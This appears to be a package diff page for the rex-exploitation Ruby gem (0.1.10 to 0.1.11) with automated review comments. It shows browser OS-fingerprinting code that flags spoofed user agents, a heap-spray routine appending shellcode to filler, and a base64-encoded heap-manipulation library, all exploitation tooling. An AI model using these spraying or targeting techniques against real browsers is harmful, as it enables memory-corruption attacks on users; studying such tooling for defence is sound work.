rex-exploitation 0.1.10 → 0.1.11
- checksums.yaml +4 -4
- checksums.yaml.gz.sig +0 -0
- data.tar.gz.sig +0 -0
- data/data/js/detect/os.js +6 -6
- data/data/js/memory/property_spray.js +2 -1
- data/lib/rex/exploitation/heaplib.js.b64 +3 -2
- data/lib/rex/exploitation/version.rb +1 -1
- metadata +2 -2
- metadata.gz.sig +0 -0
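--- a/checksums.yaml
+++ b/checksums.yaml
@@ -1,7 +1,7 @@
 ---
 SHA1:
-metadata.gz:
-data.tar.gz:
+metadata.gz: 45940b1990fb22c0fb3459d49c3d8a8a3849840c
+data.tar.gz: ee825e91fc633817f4821c09837d4fb7f7db5976
 SHA512:
-metadata.gz:
-data.tar.gz:
+metadata.gz: c3072b0583cc235df16848ccddb4e9ec21bb86918c1ef9b6473c3030ef13bf1fb3b0f9f7faaa9f41e197a545a78df314562e672895efbb4dd23c81feea99a269
+data.tar.gz: 77cdcabefffb9c49605ae5625a2172d22a8b237a70c35031c31e407f783237926a0b4fd233cdf6ee01d1ff7b0a8de133c0d707642a69129a1de12f1d63102684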
checksums.yaml.gz.sig
CHANGED
|
Binary file
|
data.tar.gz.sig
CHANGED
|
Binary file
|
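--- a/data/data/js/detect/os.js
+++ b/data/data/js/detect/os.js
@@ -44,7 +44,7 @@ os_detect.getVersion = function(){
 var arch = "";
 var useragent = navigator.userAgent;
 // Trust but verify...
-var
+var lying = false;
 
 var version = "";
 var unknown_fingerprint = null;
@@ -75,7 +75,7 @@ os_detect.getVersion = function(){
 if (window.opera) {
 ua_name = clients_opera;
 if (!navigator.userAgent.match(/Opera/)) {
-
+lying = true;
 }
 // This seems to be completely accurate, e.g. "9.21" is the return
 // value of opera.version() when run on Opera 9.21
@@ -209,7 +209,7 @@ os_detect.getVersion = function(){
 
 ua_version = this.searchVersion(search, navigator.userAgent);
 if (!ua_version || 0 == ua_version.length) {
-
+lying = true;
 }
 } else if (navigator.oscpu && !document.all && navigator.taintEnabled || 'MozBlobBuilder' in window) {
 // Use taintEnabled to identify FF since other recent browsers
@@ -369,7 +369,7 @@ os_detect.getVersion = function(){
 ua_version = "1";
 }
 if (navigator.oscpu != navigator.platform) {
-
+lying = true;
 }
 // oscpu is unaffected by changes in the useragent and has values like:
 // "Linux i686"
@@ -708,7 +708,7 @@ os_detect.getVersion = function(){
 //--
 // Figure out the type of Windows
 //--
-if (!
+if (!lying) {
 version = useragent.toLowerCase();
 } else if (navigator.oscpu) {
 // Then this is Gecko and we can get at least os_name without the
@@ -801,7 +801,7 @@ os_detect.getVersion = function(){
 }
 
 this.os_name = os_name;
-this.
+this.lying = lying;
 this.os_vendor = os_vendor;
 this.os_flavor = os_flavor;
 this.os_device = os_device;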
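Review bot: The new `lying` flag is declared at line 47 and exported as `this.lying` at line 804 with no comment saying what it records. In the visible hunks it is set when `window.opera` exists but the User-Agent lacks "Opera", when `searchVersion` returns no version, and when `navigator.oscpu` differs from `navigator.platform`, so a comment at the declaration such as `// true when navigator.userAgent disagrees with other properties the browser reports` would document it. The removed lines are truncated on this page, so the previous property name is not visible; if it was different, any consumer still reading the old name now gets `undefined`, which is worth checking. `os_detect.getVersion` starts and ends outside these hunks.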
@@ -21,7 +21,8 @@ function sprayHeap( oArg ) {
|
|
|
21
21
|
|
|
22
22
|
sym_div_container.style.cssText = "display:none";
|
|
23
23
|
var data;
|
|
24
|
-
|
|
24
|
+
foo = "%u2020%u2020";
|
|
25
|
+
junk = unescape(foo);
|
|
25
26
|
while (junk.length < offset+0x1000) junk += junk;
|
|
26
27
|
|
|
27
28
|
data = junk.substring(0,offset) + shellcode;
|
|
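Review bot: `foo` and `junk` on the two added lines (24 and 25) are assigned without `var`, and the only declaration visible in this hunk is `var data;`. Unless both names are declared earlier in `sprayHeap`, they become implicit globals shared with every other script on the page, and the assignments would throw a ReferenceError if the file is ever run in strict mode. If they are not declared elsewhere, write `var foo = "%u2020%u2020";` and `var junk = unescape(foo);`. This hunk has no file header on the page; going by the file list it appears to belong to data/data/js/memory/property_spray.js, and `sprayHeap` begins and ends outside the hunk.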
@@ -54,8 +54,8 @@ YXhBbGxvYyA9IChtYXhBbGxvYyA/IG1heEFsbG9jIDogNjU1MzUpOw0KICAg
|
|
|
54
54
|
IHRoaXMuaGVhcEJhc2UgPSAoaGVhcEJhc2UgPyBoZWFwQmFzZSA6IDB4MTUw
|
|
55
55
|
MDAwKTsNCg0KICAgIC8vIEFsbG9jYXRlIGEgcGFkZGluZyBzdHJpbmcgdGhh
|
|
56
56
|
dCB1c2VzIG1heEFsbG9jIGJ5dGVzDQogICAgdGhpcy5wYWRkaW5nU3RyID0g
|
|
57
|
-
|
|
58
|
-
|
|
57
|
+
IkFBQUEiOw0KDQogICAgZm9yICg7NCArIHRoaXMucGFkZGluZ1N0ci5sZW5n
|
|
58
|
+
dGgqMiArIDIgPCB0aGlzLm1heEFsbG9jOykgew0KICAgICAgICB0aGlzLnBh
|
|
59
59
|
ZGRpbmdTdHIgKz0gdGhpcy5wYWRkaW5nU3RyOw0KICAgIH0NCiAgICANCiAg
|
|
60
60
|
ICAvLyBDcmVhdGUgYW4gYXJyYXkgZm9yIHN0b3JpbmcgcmVmZXJlbmNlcyB0
|
|
61
61
|
byBhbGxvY2F0ZWQgbWVtb3J5DQogICAgdGhpcy5tZW0gPSBuZXcgQXJyYXko
|
|
@@ -329,3 +329,4 @@ ICAgIHZ0YWJsZSArPSB1bmVzY2FwZSgiJXUwMDI4JXUwMDI4IikgKyAgICAv
|
|
|
329
329
|
LyB0d28gc3ViIFtlYXhdLCBhbCBpbnN0cnVjdGlvbnMNCiAgICAgICAgICAg
|
|
330
330
|
ICAgc2hlbGxjb2RlICsgaGVhcC5wYWRkaW5nKChzaXplLTEzOCkvMiAtIHNo
|
|
331
331
|
ZWxsY29kZS5sZW5ndGgpOw0KDQogICAgcmV0dXJuIHZ0YWJsZTsNCn0NCg==
|
|
332
|
+
|
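--- a/metadata
+++ b/metadata
@@ -1,7 +1,7 @@
 --- !ruby/object:Gem::Specification
 name: rex-exploitation
 version: !ruby/object:Gem::Version
-version: 0.1.
+version: 0.1.11
 platform: ruby
 authors:
 - David Maloney
@@ -88,7 +88,7 @@ cert_chain:
 G+Hmcg1v810agasPdoydE0RTVZgEOOMoQ07qu7JFXVWZ9ZQpHT7qJATWL/b2csFG
 8mVuTXnyJOKRJA==
 -----END CERTIFICATE-----
-date: 2017-
+date: 2017-02-23 00:00:00.000000000 Z
 dependencies:
 - !ruby/object:Gem::Dependency
 name: bundler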
metadata.gz.sig
CHANGED
|
Binary file
|